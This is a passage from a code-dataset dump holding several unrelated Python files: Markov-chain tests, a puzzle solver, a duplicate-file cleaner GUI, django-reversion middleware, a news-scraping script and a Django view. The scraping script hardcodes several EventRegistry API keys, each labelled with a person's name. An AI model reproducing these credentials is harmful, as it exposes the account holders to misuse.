np.random.randint(nstates)\n weights = np.random.exponential(size=nstates)\n weights[jmissing] = 0\n total_weight = np.sum(weights)\n for j, weight in enumerate(weights):\n if j != jmissing:\n p = weight / total_weight\n P.add_edge(i, j, weight=p)\n return P\n\n\ndef _get_random_test_setup(nstates):\n \"\"\"\n\n Returns\n -------\n T : undirected networkx graph\n Edges are annotated with transition matrix P.\n root : integer\n Root node.\n root_distn : dict\n Probability distribution at the root.\n node_to_allowed_states : dict\n Map from node to set of allowed states.\n\n \"\"\"\n # Sample a random tree.\n branching_distn = [0.7, 0.1, 0.1, 0.1]\n T = get_random_branching_tree(branching_distn, maxnodes=6)\n root = 0\n\n # For each edge on the tree,\n # sample a random sparse state transition matrix.\n for na, nb in nx.bfs_edges(T, root):\n T[na][nb]['P'] = _get_random_nx_transition_matrix(nstates)\n\n # Sample a root distribution.\n # It should be a little bit sparse, for testing.\n weights = np.random.exponential(size=nstates)\n imissing = np.random.randint(nstates)\n pairs = [(i, w) for i, w in enumerate(weights) if i != imissing]\n weights[imissing] = 0\n total_weight = np.sum(weights)\n root_distn = dict((i, w / total_weight) for i, w in pairs)\n\n # Sample allowed states at each node.\n # Disallow a random state at each node.\n states = range(nstates)\n node_to_allowed_states = dict((n, set(states)) for n in T)\n for n in T:\n imissing = np.random.randint(nstates)\n node_to_allowed_states[n].remove(imissing)\n\n # Final check on transition matrices on edges of T.\n for na, nb in nx.bfs_edges(T, root):\n edge_object = T[na][nb]\n P = edge_object.get('P', None)\n if P is None:\n raise Exception('internal error')\n\n # Return the random info for testing.\n return T, root, root_distn, node_to_allowed_states\n\n\ndef _assert_dict_distn_allclose(da, db):\n # This is a helper function for testing.\n assert_equal(set(da), set(db))\n da_vector = np.array(\n [v for k, v in sorted(da.items())], dtype=float)\n db_vector = np.array(\n [v for k, v in sorted(db.items())], dtype=float)\n assert_allclose(da_vector, db_vector)\n\n\ndef _assert_nx_matrix_allclose(U, V):\n # This is a helper function for testing.\n assert_equal(set(U), set(V))\n assert_equal(set(U.edges()), set(V.edges()))\n U_weights = []\n V_weights = []\n for a, b in U.edges():\n U_weights.append(U[a][b]['weight'])\n V_weights.append(V[a][b]['weight'])\n u = np.array(U_weights, dtype=float)\n v = np.array(V_weights, dtype=float)\n assert_allclose(u, v)\n\n\nclass TestMarkovChain(TestCase):\n\n def test_history_log_likelihood_P_default(self):\n T = nx.Graph()\n T.add_edge(0, 1)\n T.add_edge(0, 2)\n T.add_edge(0, 3)\n root = 0\n node_to_state = {0:0, 1:0, 2:0, 3:0}\n root_distn = {0 : 0.5, 1 : 0.5, 2 : 0, 3 : 0}\n P = nx.DiGraph()\n P.add_weighted_edges_from([\n (0, 0, 0.5),\n (0, 1, 0.25),\n (0, 2, 0.25),\n (1, 1, 0.5),\n (1, 2, 0.25),\n (1, 0, 0.25),\n (2, 2, 0.5),\n (2, 0, 0.25),\n (2, 1, 0.25)])\n desired = 4 * np.log(0.5)\n\n # Check sparse mc0.\n actual_sparse = _mc0.get_history_log_likelihood(\n T, root, node_to_state,\n root_distn=root_distn, P_default=P)\n assert_equal(actual_sparse, desired)\n\n # Check dense mc0.\n P_dense = nx.to_numpy_matrix(P, nodelist=range(3)).A\n actual_dense = _mc0_dense.get_history_log_likelihood(\n T, root, node_to_state,\n root_distn=root_distn, P_default=P_dense)\n assert_equal(actual_dense, desired)\n\n def test_node_to_distn(self):\n # Test the marginal distributions of node states.\n\n # Try an example where no state is initially known,\n # but for which the transition matrix will cause\n # the joint distribution of states at all nodes to be\n # all in the same state.\n # This will cause all states to have the same distribution\n # as the root distribution.\n nstates = 3\n states = range(nstates)\n P = nx.DiGraph()\n P.add_weighted_edges_from([(s, s, 1) for s in states])\n T = nx.Graph()\n T.add_edge(0, 1)\n T.add_edge(0, 2)\n T.add_edge(0, 3)\n root = 0\n node_to_allowed_states = dict((n, set(states)) for n in T)\n for root_distn in (\n {0 : 0.10, 1 : 0.40, 2 : 0.50},\n {0 : 0.25, 1 : 0.50, 2 : 0.25},\n ):\n\n # Code common to both sparse and dense tests.\n node_to_set = node_to_allowed_states\n\n # Sparse test.\n\n # Get the node distributions naively.\n node_to_distn_naive_sparse = _mc0.get_node_to_distn_naive(\n T, root, node_to_set, root_distn=root_distn, P_default=P)\n\n # Get the node distributions more cleverly,\n # through the restricted pmap.\n node_to_pmap_sparse = _mcy.get_node_to_pmap(T, root,\n node_to_allowed_states=node_to_allowed_states,\n P_default=P)\n node_to_distn_fast_sparse = _mc0.get_node_to_distn(\n T, root, node_to_pmap_sparse,\n root_distn=root_distn, P_default=P)\n\n # Convert distributions to ndarrays for approximate comparison.\n for node, distn in node_to_distn_naive_sparse.items():\n _assert_dict_distn_allclose(root_distn, distn)\n for node, distn in node_to_distn_fast_sparse.items():\n _assert_dict_distn_allclose(root_distn, distn)\n\n # Dense test.\n # Get the dense transition matrix.\n P_dense = nx.to_numpy_matrix(P, states).A\n root_ndarray_distn = dict_to_numpy_array(root_distn, range(nstates))\n\n # Get the node distributions naively.\n node_to_distn_naive_dense = _mc0_dense.get_node_to_distn_naive(\n T, root, node_to_set, nstates,\n root_distn=root_ndarray_distn, P_default=P_dense)\n\n # Get the node distributions more cleverly,\n # through the restricted pmap.\n node_to_pmap_dense = _mcy_dense.get_node_to_pmap(T, root, nstates,\n node_to_allowed_states=node_to_allowed_states,\n P_default=P_dense)\n node_to_distn_fast_dense = _mc0_dense.get_node_to_distn(\n T, root, node_to_pmap_dense, nstates,\n root_distn=root_ndarray_distn, P_default=P_dense)\n node_to_distn_esd_dense = _mc0_dense.get_node_to_distn_esd(\n T, root, node_to_pmap_dense, nstates,\n root_distn=root_ndarray_distn, P_default=P_dense)\n\n # Convert distributions to ndarrays for approximate comparison.\n for node, distn in node_to_distn_naive_dense.items():\n assert_allclose(distn, root_ndarray_distn)\n for node, distn in node_to_distn_fast_dense.items():\n assert_allclose(distn, root_ndarray_distn)\n for node, distn in node_to_distn_esd_dense.items():\n assert_allclose(distn, root_ndarray_distn)\n\n\n def test_node_to_distn_naive_vs_fast_random(self):\n # Test the marginal distributions of node states.\n\n # This test uses a complicated tree with complicated transitions.\n # It checks the naive way of computing node_to_distn against\n # the more clever fast way to compute node_to_distn.\n # The two methods should give the same answer.\n np.random.seed(1234)\n nstates = 4\n nsamples = 10\n for i in range(nsamples):\n info = _get_random_test_setup(nstates)\n T, root, root_distn, node_to_allowed_states = info\n assert_equal(len(T), len(node_to_allowed_states))\n assert_(all(len(v) > 1 for v in node_to_allowed_states.values()))\n\n # Code common to both sparse and dense tests.\n node_to_set = node_to_allowed_states\n\n # Sparse tests.\n\n # Get the node distributions naively.\n node_to_distn_naive = _mc0.get_node_to_distn_naive(T, root,\n node_to_set, root_distn=root_distn)\n\n # Get the node distributions more cleverly,\n # through the restricted pmap.\n node_to_pmap = _mcy.get_node_to_pmap(T, root,\n node_to_allowed_states=node_to_allowed_states)\n node_to_distn_fast = _mc0.get_node_to_distn(T, root, node_to_pmap,\n root_distn=root_distn)\n\n # Compare distributions at the root.\n root_distn_naive = node_to_distn_naive[root]\n root_distn_fast = node_to_distn_fast[root]\n _assert_dict_distn_allclose(root_distn_naive, root_distn_fast)\n\n # Compare distributions at all nodes.\n for node in T:\n distn_naive = node_to_distn_naive[node]\n distn_fast = node_to_distn_fast[node]\n _assert_dict_distn_allclose(distn_naive, distn_fast)\n\n # Dense tests.\n # Use edge-specific dense ('esd') transition matrices.\n # Get the dense root distribution.\n T_esd = nx.Graph()\n for na, nb in nx.bfs_edges(T, root):\n P = T[na][nb]['P']\n P_dense = nx.to_numpy_matrix(P, range(nstates)).A\n T_esd.add_edge(na, nb, P=P_dense)\n root_distn_dense = dict_to_numpy_array(root_distn, range(nstates))\n\n # Get the node distributions naively.\n node_to_distn_naive_dense = _mc0_dense.get_node_to_distn_naive(\n T_esd, root, node_to_set, nstates,\n root_distn=root_distn_dense)\n\n # Get the node distributions more cleverly,\n # through the restricted pmap.\n node_to_pmap_dense = _mcy_dense.get_node_to_pmap(\n T_esd, root, nstates,\n node_to_allowed_states=node_to_allowed_states)\n for n, sparse_pmap in node_to_pmap.items():\n a = dict_to_numpy_array(sparse_pmap, range(nstates))\n b = node_to_pmap_dense[n]\n err_msg = 'n: %s' % n\n assert_allclose(a, b, err_msg=err_msg)\n node_to_distn_fast_dense = _mc0_dense.get_node_to_distn(\n T_esd, root, node_to_pmap_dense, nstates,\n root_distn=root_distn_dense)\n node_to_distn_esd_dense = _mc0_dense.get_node_to_distn_esd(\n T_esd, root, node_to_pmap_dense, nstates,\n root_distn=root_distn_dense)\n\n # Compare distributions at the root.\n root_distn_naive_dense = node_to_distn_naive_dense[root]\n root_distn_fast_dense = node_to_distn_fast_dense[root]\n root_distn_esd_dense = node_to_distn_esd_dense[root]\n assert_allclose(root_distn_fast_dense, root_distn_naive_dense)\n assert_allclose(root_distn_esd_dense, root_distn_naive_dense)\n\n # Compare distributions at all nodes.\n for node in T_esd:\n distn_naive_dense = node_to_distn_naive_dense[node]\n distn_fast_dense = node_to_distn_fast_dense[node]\n distn_esd_dense = node_to_distn_esd_dense[node]\n assert_allclose(distn_fast_dense, distn_naive_dense)\n assert_allclose(distn_esd_dense, distn_naive_dense)\n\n def test_node_to_distn_unrestricted(self):\n # Test the marginal distributions of node states.\n\n # This test uses a complicated tree with complicated transitions.\n # It checks the naive way of computing node_to_distn against\n # the more clever fast way to compute node_to_distn.\n # The two methods should give the same answer.\n nstates = 4\n nsamples = 10\n for i in range(nsamples):\n info = _get_random_test_setup(nstates)\n T, root, root_distn, node_to_allowed_states = info\n node_to_allowed_states = dict((n, set(range(nstates))) for n in T)\n assert_equal(len(T), len(node_to_allowed_states))\n assert_(all(len(v) > 1 for v in node_to_allowed_states.values()))\n\n # Code common to both sparse and dense tests.\n node_to_set = node_to_allowed_states\n\n # Sparse tests.\n\n # Get the node distributions naively.\n node_to_distn_naive = _mc0.get_node_to_distn_naive(T, root,\n node_to_set, root_distn=root_distn)\n\n # Get the node distributions more cleverly,\n # through the restricted pmap.\n node_to_pmap = _mcy.get_node_to_pmap(T, root,\n node_to_allowed_states=node_to_allowed_states)\n node_to_distn_fast = _mc0.get_node_to_distn(\n T, root, node_to_pmap, root_distn=root_distn)\n\n # Convert distributions to ndarrays for approximate comparison.\n for node in T:\n distn_naive = node_to_distn_naive[node]\n distn_fast = node_to_distn_fast[node]\n _assert_dict_distn_allclose(distn_fast, distn_naive)\n\n # Dense tests.\n # Use edge-specific dense ('esd') transition matrices.\n # Get the dense root distribution.\n T_esd = nx.Graph()\n for na, nb in nx.bfs_edges(T, root):\n P = T[na][nb]['P']\n P_dense = nx.to_numpy_matrix(P, range(nstates)).A\n T_esd.add_edge(na, nb, P=P_dense)\n root_distn_dense = dict_to_numpy_array(root_distn, range(nstates))\n\n # Get the node distributions naively.\n node_to_distn_naive_dense = _mc0_dense.get_node_to_distn_naive(\n T_esd, root, node_to_set, nstates,\n root_distn=root_distn_dense)\n\n # Get the node distributions more cleverly,\n # through the restricted pmap.\n node_to_pmap_dense = _mcy_dense.get_node_to_pmap(\n T_esd, root, nstates,\n node_to_allowed_states=node_to_allowed_states)\n node_to_distn_fast_dense = _mc0_dense.get_node_to_distn(\n T_esd, root, node_to_pmap_dense, nstates,\n root_distn=root_distn_dense)\n node_to_distn_esd_dense = _mc0_dense.get_node_to_distn_esd(\n T_esd, root, node_to_pmap_dense, nstates,\n root_distn=root_distn_dense)\n\n # Convert distributions to ndarrays for approximate comparison.\n for node in T_esd:\n distn_naive_dense = node_to_distn_naive_dense[node]\n distn_fast_dense = node_to_distn_fast_dense[node]\n distn_esd_dense = node_to_distn_esd_dense[node]\n assert_allclose(distn_fast_dense, distn_naive_dense)\n assert_allclose(distn_esd_dense, distn_naive_dense)\n\n def test_joint_endpoint_distn(self):\n # Test joint endpoint state distributions on edges.\n nstates = 4\n nsamples = 10\n for i in range(nsamples):\n info = _get_random_test_setup(nstates)\n T, root, root_distn, node_to_allowed_states = info\n assert_equal(len(T), len(node_to_allowed_states))\n assert_(all(len(v) > 1 for v in node_to_allowed_states.values()))\n T_aug_naive = _mc0.get_joint_endpoint_distn_naive(T, root,\n node_to_allowed_states, root_distn=root_distn)\n node_to_pmap = _mcy.get_node_to_pmap(T, root,\n node_to_allowed_states=node_to_allowed_states)\n node_to_distn = _mc0.get_node_to_distn(T, root, node_to_pmap,\n root_distn=root_distn)\n T_aug_fast = _mc0.get_joint_endpoint_distn(\n T, root, node_to_pmap, node_to_distn)\n\n # Sparse tests.\n\n # Check that transition sparsity patterns agree.\n for na, nb in nx.bfs_edges(T, root):\n assert_(T_aug_naive.has_edge(na, nb))\n assert_(T_aug_fast.has_edge(na, nb))\n\n # Check that transition probability distributions agree.\n for na, nb in nx.bfs_edges(T, root):\n J_naive = T_aug_naive[na][nb]['J']\n J_fast = T_aug_fast[na][nb]['J']\n _assert_nx_matrix_allclose(J_naive, J_fast)\n\n # Dense tests.\n\n # Use edge-specific dense ('esd') transition matrices.\n # Get the dense root distribution.\n T_esd = nx.Graph()\n for na, nb in nx.bfs_edges(T, root):\n P = T[na][nb]['P']\n P_dense = nx.to_numpy_matrix(P, range(nstates)).A\n T_esd.add_edge(na, nb, P=P_dense)\n root_distn_dense = dict_to_numpy_array(root_distn, range(nstates))\n\n # Construct some dense structures.\n T_aug_naive_dense = _mc0_dense.get_joint_endpoint_distn_naive(\n T_esd, root,\n node_to_allowed_states, root_distn=root_distn_dense)\n node_to_pmap_dense = _mcy_dense.get_node_to_pmap(\n T_esd, root, nstates,\n node_to_allowed_states=node_to_allowed_states)\n node_to_distn_dense = _mc0_dense.get_node_to_distn(\n T_esd, root, node_to_pmap_dense, nstates,\n root_distn=root_distn_dense)\n T_aug_fast_dense = _mc0_dense.get_joint_endpoint_distn(\n T_esd, root,\n node_to_pmap_dense, node_to_distn_dense, nstates)\n\n # Check that transition probability distributions agree.\n for na, nb in nx.bfs_edges(T_esd, root):\n J_naive_dense = T_aug_naive_dense[na][nb]['J']\n J_fast_dense = T_aug_fast_dense[na][nb]['J']\n assert_allclose(J_naive_dense, J_fast_dense)\n\n\nif __name__ == '__main__':\n run_module_suite()\n\n","repo_name":"argriffing/raoteh","sub_path":"raoteh/sampler/tests/test_mc.py","file_name":"test_mc.py","file_ext":"py","file_size_in_byte":19291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17360826193","text":"class Weapon:#武器类\n def __init__(self):\n print(\"我是一种武器\")\n def Date(self,kind,atk):\n self.kind = kind\n self.atk =atk\n print(\"%s的攻击力有了\"%self.kind)\n def Action(self,price,attack):\n self.price = price\n self.attack = attack\n print(\"%s的价格是:%s\" % (self.kind,self.price))\n print(\"%s要攻击你了\"%self.kind)#调用实力变量self。kind\n\nclass Gun(Weapon):\n \"\"\"子类构造函数,不调用父类\"\"\"\n def __init__(self):#覆写父类方法\n pass\n def Date(self,atk,atk_speed):\n super().Date(\"手枪\",atk)\n self.atk_speed = atk_speed\n self.powder = self.atk * self.atk_speed\n print(\"每秒攻击力:%d\"%self.powder)\n\nclass Grenade(Weapon):#无覆写父类方法,会出现父类__init__\n \"\"\"子类不构造函数,自动调用父类\"\"\"\n def Date(self,atk,atk_scope):\n super().Date(\"手雷\",atk)\n self.atk_scope= atk_scope\n print(\"攻击范围:%d\"%self.atk_scope)\n\nw01 = Weapon()\nw01.Date(\"武器\",123)\nw01.Action(244,21)\n\ng01 =Gun()\ng01.Date(1221,12)\ng01.Action(2121,122)\n\nG01 = Grenade()\nG01.Date(1221,32)\nG01.Action(1221,21)","repo_name":"15988108363/Github","sub_path":"2020.06.29-武器.py","file_name":"2020.06.29-武器.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5564181008","text":"from .claspy import *\nfrom . import utils\nfrom .utils import borders\nfrom .utils.borders import Direction\nfrom .utils.shading import *\nfrom .utils.grids import *\n\ndef encode(string):\n return utils.encode(string, has_borders = True)\n\ndef solve(E):\n rooms = utils.regions.full_bfs(E.R, E.C, E.edges)\n # Map clue numbers to their rooms.\n clue_coord_to_room = {}\n for clue in E.clues:\n for room in rooms:\n for cell in room:\n if clue == cell:\n clue_coord_to_room[clue] = room\n break\n\n max_val = max(max([len(room) for room in rooms]), max(E.clues.values(), default = 0))\n set_max_val(max_val)\n s = RectangularGridShadingSolver(E.R, E.C)\n conn = [[Atom() for c in range(E.C)] for r in range(E.R)]\n chosen = [[BoolVar() for c in range(E.C)] for r in range(E.R)]\n num_shaded_in_region = [[IntVar(1, max_val) for c in range(E.C)] for r in range(E.R)]\n\n # Shaded cells in a region must be connected.\n for room in rooms:\n for (r, c) in room:\n # Connected iff shaded.\n require(conn[r][c] == s.grid[r][c])\n # Prove the \"chosen\" cell for the region.\n conn[r][c].prove_if(chosen[r][c])\n # Prove via connectivity.\n for (y, x) in get_neighbors(E.R, E.C, r, c):\n if (y, x) in room:\n conn[r][c].prove_if(conn[y][x] & s.grid[r][c])\n # Choose 1 cell per region.\n require(at_most(1, [chosen[r][c] for (r, c) in room]))\n\n # Clue cells indicate number of shaded cells there.\n for coord, room in clue_coord_to_room.items():\n require(sum_bools(E.clues[coord], [s.grid[r][c] for (r, c) in room]))\n\n # Every room has at least 1 shaded cell.\n for room in rooms:\n # Don't need to check clued cells.\n if room not in clue_coord_to_room.values():\n require(at_least(1, [s.grid[r][c] for (r, c) in room]))\n \n # Calculate # shaded in each region (needed for next step).\n for room in rooms:\n num_shaded = IntVar(0)\n for (r, c) in room:\n num_shaded += cond(s.grid[r][c], 1, 0)\n for (r, c) in room:\n require(num_shaded_in_region[r][c] == num_shaded)\n\n for r in range(E.R):\n for c in range(E.C):\n if r < E.R:\n if (r+1, c, Direction.TOP) in E.edges:\n # Regions with same # black cells cannot be adjacent.\n require(num_shaded_in_region[r][c] != num_shaded_in_region[r+1][c])\n # Cells orthogonally adjacent across region boundaries - >= 1 unshaded.\n require(at_most(1, [s.grid[r][c], s.grid[r+1][c]]))\n if c < E.C:\n if (r, c+1, Direction.LEFT) in E.edges:\n # Regions with same # black cells cannot be adjacent.\n require(num_shaded_in_region[r][c] != num_shaded_in_region[r][c+1])\n # Cells orthogonally adjacent across region boundaries - >= 1 unshaded.\n require(at_most(1, [s.grid[r][c], s.grid[r][c+1]]))\n \n return s.solutions(shaded_color = 'darkgray')\n\ndef decode(solutions):\n return utils.decode(solutions)","repo_name":"mstang107/noq","sub_path":"solvers/shimaguni.py","file_name":"shimaguni.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"46694237966","text":"from tkinter import filedialog\r\nimport tkinter.font as font\r\nfrom tkinter import *\r\nfrom packages.deletecopies import *\r\n\r\ndef browse_button():\r\n # Allow user to select a directory and store it in global var\r\n # called folder_path\r\n filename = filedialog.askdirectory()\r\n if filename != \"\":\r\n folder_path.set(filename)\r\n finished_statement.set(\"Click the button to start cleaning\")\r\n\r\n\r\nroot = Tk()\r\nroot.geometry(\"500x250\")\r\nroot.resizable(False, False)\r\nroot.title(\"Duplicates Deleter\")\r\nroot.configure(bg=\"#303444\")\r\nroot.iconphoto(False, PhotoImage(file='assets/icon/logo.png'))\r\n\r\nfolder_path = StringVar(value=\"Please select a folder\")\r\nfinished_statement = StringVar(value=\"Click the button to start cleaning\")\r\n\r\n\r\n# Styling\r\ntitleFont = font.Font(size=18, weight=font.BOLD)\r\nshowLabelFont = font.Font(family=\"Helvetica\")\r\nfinishedFont = font.Font(family=\"Helvetica\", size=8)\r\nbrowseButtonFont = font.Font(family=\"Arial\", size=10, weight=font.BOLD)\r\ndeleteButtonFont = font.Font(family=\"Arial\", size=12, weight=font.BOLD)\r\n\r\nprimary = \"#303444\"\r\nsecondary = \"#3E4458\"\r\nwhite = \"#fff\"\r\n\r\nmiddle = 0.5\r\n\r\n\r\ntitleLabel = Label(master=root, text=\"Duplicates Deleter\", bg=primary, fg=white,anchor='w', height=2)\r\ntitleLabel.place(relx=middle, rely=0.18, anchor=CENTER)\r\ntitleLabel['font'] = titleFont\r\n\r\nshowLabel = Label(master=root,textvariable=folder_path, bg=secondary, fg=white,anchor='w', height=2)\r\nshowLabel.pack(fill='x', padx=30, pady=92)\r\nshowLabel['font'] = showLabelFont\r\n\r\nselectButton = Button(text=\"SELECT\", command=browse_button, bg=primary, fg=white, height=1)\r\nselectButton.place(relx=0.86, rely=0.45, anchor=CENTER)\r\nselectButton['font'] = browseButtonFont\r\n\r\ndeleteButton = Button(text=\"CLEAN\", command=lambda:check_for_duplicates([folder_path.get()], finished_statement), bg=white, fg=primary, height=2, width=12)\r\ndeleteButton.place(relx=middle, rely=0.76, anchor=CENTER)\r\ndeleteButton['font'] = deleteButtonFont\r\n\r\nfinishedLabel = Label(master=root,textvariable=finished_statement, bg=primary, fg=white,anchor='w')\r\nfinishedLabel.place(relx=middle, rely=0.93, anchor=CENTER)\r\nfinishedLabel['font'] = finishedFont\r\n\r\nmainloop()\r\n","repo_name":"alessandrobelottidev/DuplicatesCleaner","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"32681008457","text":"import json\n\ndata = {\n \"details1\": {\n \"name\": \"YxZ\",\n \"subject\": \"Engineering\",\n \"City\": \"Pune\"\n },\n \"details2\": {\n \"name\": \"AcB\",\n \"subject\": \"Science\",\n \"City\": \"Chennai\"\n }\n}\n\nif __name__ == '__main__':\n\n # Opens the json file in write mode to overwrite the data\n with open('sample.json', 'w') as f:\n \"\"\"Serialization is the process wherein we \\\n convert the data type of the raw data into a JSON format.\n \"\"\"\n json.dump(data, f, indent=4, separators=(',', ': '))\n\n # Opens the json file in read mode to dump data, throws an error\n \"\"\"with open('sample.json', 'r') as f:\n json.dump(data, f)\n \"\"\"\n with open('sample.json', 'r+') as f:\n \"\"\"with deserialization, we can easily convert\\\n the JSON data into the default/native data type which is usually a dictionary.\n \"\"\"\n a = json.load(f)\n print(a, '\\n')\n for item in a:\n print(a[item]['name'])\n\n with open('sample.json', 'a') as f:\n json.dump({\"name\": \"John\", \"age\": 30}, f)\n json.dump([\"apple\", \"bananas\"], f)\n print(json.dumps((\"apple\", \"bananas\")))\n print(json.dumps(\"hello\"))\n print(json.dumps(42))\n print(json.dumps(31.76))\n print(json.dumps(True))\n print(json.dumps(False))\n print(json.dumps(None))\n","repo_name":"divyaChandran10/my_new_project","sub_path":"May16_jsonFiles/Trial.py","file_name":"Trial.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11842105648","text":"#!/usr/bin/env python3\n\n#import\n#import math\n#import numpy as np\nN = int(input())\n\none = []\nzero = []\n\nfor _ in range(N):\n S = input()\n\n if S[0] == \"!\":\n one.append(S[1:])\n else:\n zero.append(S)\n\none.sort()\nzero.sort()\n\ni = 0; j = 0\n\nwhile i < len(one) and j < len(zero):\n if one[i] == zero[j]:\n print(one[i])\n exit()\n\n if one[i] < zero[j]:\n i += 1\n else:\n j += 1\n\nprint(\"satisfiable\")\n\n\n\n","repo_name":"Yukikazari/kyoupuro","sub_path":".提出一覧/AtCoder/abc187/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34908492548","text":"\"\"\"Middleware used by Reversion.\"\"\"\n\nfrom __future__ import unicode_literals\n\nfrom django.core.exceptions import ImproperlyConfigured\n\nfrom reversion.revisions import revision_context_manager\n\n\nREVISION_MIDDLEWARE_FLAG = \"reversion.revision_middleware_active\"\n\n\nclass RevisionMiddleware(object): # pragma: no cover\n\n \"\"\"Wraps the entire request in a revision.\"\"\"\n\n def process_request(self, request):\n \"\"\"Starts a new revision.\"\"\"\n if request.META.get(REVISION_MIDDLEWARE_FLAG, False):\n raise ImproperlyConfigured(\"RevisionMiddleware can only be included in MIDDLEWARE_CLASSES once.\")\n request.META[REVISION_MIDDLEWARE_FLAG] = True\n revision_context_manager.start()\n\n def _close_revision(self, request):\n \"\"\"Closes the revision.\"\"\"\n if request.META.get(REVISION_MIDDLEWARE_FLAG, False):\n del request.META[REVISION_MIDDLEWARE_FLAG]\n revision_context_manager.end()\n\n def process_response(self, request, response):\n \"\"\"Closes the revision.\"\"\"\n # look to see if the session has been accessed before looking for user to stop Vary: Cookie\n if hasattr(request, 'session') and request.session.accessed \\\n and hasattr(request, \"user\") and request.user is not None and request.user.is_authenticated() \\\n and revision_context_manager.is_active():\n revision_context_manager.set_user(request.user)\n self._close_revision(request)\n return response\n\n def process_exception(self, request, exception):\n \"\"\"Closes the revision.\"\"\"\n revision_context_manager.invalidate()\n self._close_revision(request)\n","repo_name":"mudong1991/mudong_blog","sub_path":"blog_project_venv/Lib/site-packages/reversion/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"23999999123","text":"import eventregistry as ER\nimport datetime\nimport pandas as pd\nimport time\nfrom eventregistry import *\n\ner = ER.EventRegistry(apiKey=\"5ba73408-ea81-459b-abf4-6fedd8cb8ec6\") # dany\n#er = ER.EventRegistry(apiKey = \"5fed3642-762a-4abc-aabf-ac6213c1bcea\") #philipp\n#er = ER.EventRegistry(apiKey = \"7571801b-6710-4166-90cc-9c5352ddeedd\") #andi\n#er = ER.EventRegistry(apiKey=\"1b673182-c9e4-4554-90cf-d082a0bd6b53\") # Hendrik?\nanalytics = ER.Analytics(er)\n\n# DEFINE companies\ncompanies = ['Samsung', 'BASF', 'Apple', 'Tesla', 'Airbus', 'Bayer', 'BMW', 'Telefonica', 'Google', 'Allianz', 'Total']\n\n# DEFINE start and end date\nstartDate = datetime.date(2018, 7, 18)\nendDate = datetime.date(2018, 7, 18)\n# Get all Business Days in Period\ntime_frame = pd.bdate_range(startDate, endDate)\n\n\n# Set maximum number of articles per day\nnumber_of_articles = 50\n\n# DEFINE df results columns\nresult = dict()\n\nfor company in companies:\n print(\"- Starting article processing for company :\", company)\n # Dictionary\n result.update({company:{}})\n for day in time_frame:\n # QUERY articles related to current company\n print(\"-- Start article processing for Date: \", day)\n\n result[company].update({day.strftime('%Y-%m-%d'): []})\n q = ER.QueryArticlesIter(conceptUri=er.getConceptUri(company), lang=\"eng\", dateStart=day.date(),\n dateEnd=day.date())\n articles = q.execQuery(er, sortBy=[\"date\", \"sourceImportance\"], sortByAsc=False, lang=[\"eng\"],\n returnInfo=ReturnInfo(\n articleInfo=ArticleInfoFlags(socialScore=True, originalArticle=True, categories=True,\n concepts=True, sentiment=True, duplicateList=True)),\n maxItems=number_of_articles, articleBatchSize=50)\n\n\n\n # Iterate over all articles about the current company\n # Calculate Sentiment and save in day`s column and index\n while True:\n try:\n article = next(articles)\n except AssertionError:\n print(\"Article throws assertion error!\")\n continue\n except StopIteration:\n break\n\n result[company][day.strftime('%Y-%m-%d')].append(article['body'])\n\n\n print(\"- Company fully processed : \", company)\n\n\n\nprint(\"All Articles fully processed\")\nprint(\"Save Data to csv\")\nPATH = \"data/article_bodies_\" + str(startDate) + \"_\" + str(endDate) + \".json\"\n\nimport json\nwith open(PATH, 'w') as fp:\n json.dump(result, fp)\n","repo_name":"kosnil/kd-seminar","sub_path":"er_body_data/get_article_bodies.py","file_name":"get_article_bodies.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"32848011723","text":"from django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\n\nfrom dashboard.models import Klass, SessionReport, StudentPromotionHistory\nfrom setup.models import Attitude, Conduct, Interest, Remark, SchoolSession\n\n\nclass ClassTeacherSessionReportFilterView(PermissionRequiredMixin, View):\n template_name = \"dashboard/class_teacher_report/report_filter.html\"\n permission_required = [\n \"setup.change_class_teacher_remark\",\n ]\n\n @method_decorator(login_required(login_url=\"accounts:login\"))\n def get(self, request):\n sessions = SchoolSession.objects.all().order_by(\"-start_date\")\n\n if not request.user.has_perm(\"setup.manage_other_report\"):\n if hasattr(request.user, \"staff\"):\n classes = request.user.staff.classes.all()\n else:\n classes = Klass.objects.none()\n else:\n classes = Klass.objects.all()\n\n context = {\n \"sessions\": sessions,\n \"classes\": classes.order_by(\"stage\"),\n }\n return render(request, self.template_name, context)\n\n\nclass ClassTeacherSessionReportDataView(PermissionRequiredMixin, View):\n template_name = \"dashboard/class_teacher_report/class_teacher_report_data.html\"\n permission_required = [\n \"setup.change_class_teacher_remark\",\n ]\n\n @method_decorator(login_required(login_url=\"accounts:login\"))\n def get(self, request):\n session_id = request.GET.get(\"session\") or -1\n class_id = request.GET.get(\"class\") or -1\n session = SchoolSession.objects.filter(id=session_id).first()\n klass = Klass.objects.filter(id=class_id).first()\n\n if not (klass and session):\n messages.error(request, \"Please select a session and class\")\n return redirect(\"dashboard:class_teacher_report_filter\")\n\n promotion_history = StudentPromotionHistory.objects.filter(\n session__academic_year=session.academic_year, new_class=klass)\n students = promotion_history.values_list(\"student\", flat=True)\n\n for student_id in students:\n SessionReport.objects.get_or_create(student_id=student_id,\n klass=klass,\n session=session)\n\n reports = SessionReport.objects.filter(student__in=students,\n student__deleted=False,\n klass=klass,\n 